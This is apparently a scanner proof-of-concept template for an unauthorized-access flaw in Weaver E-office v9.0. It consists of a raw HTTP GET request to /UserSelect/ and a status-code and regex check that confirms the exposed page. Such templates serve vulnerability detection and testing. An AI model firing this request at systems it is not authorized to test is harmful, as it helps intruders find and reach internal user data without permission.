<DudePoc_Name>泛微 E-office v9.0 未授权访问漏洞</DudePoc_Name>
<DudePoc_Description>上海泛微网络科技股份有限公司 E-office 存在未授权访问</DudePoc_Description>
<DudePoc_SetHeader>
GET /UserSelect/ HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?选择人员)(?=.*?top.php)(?=.*?main.php).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
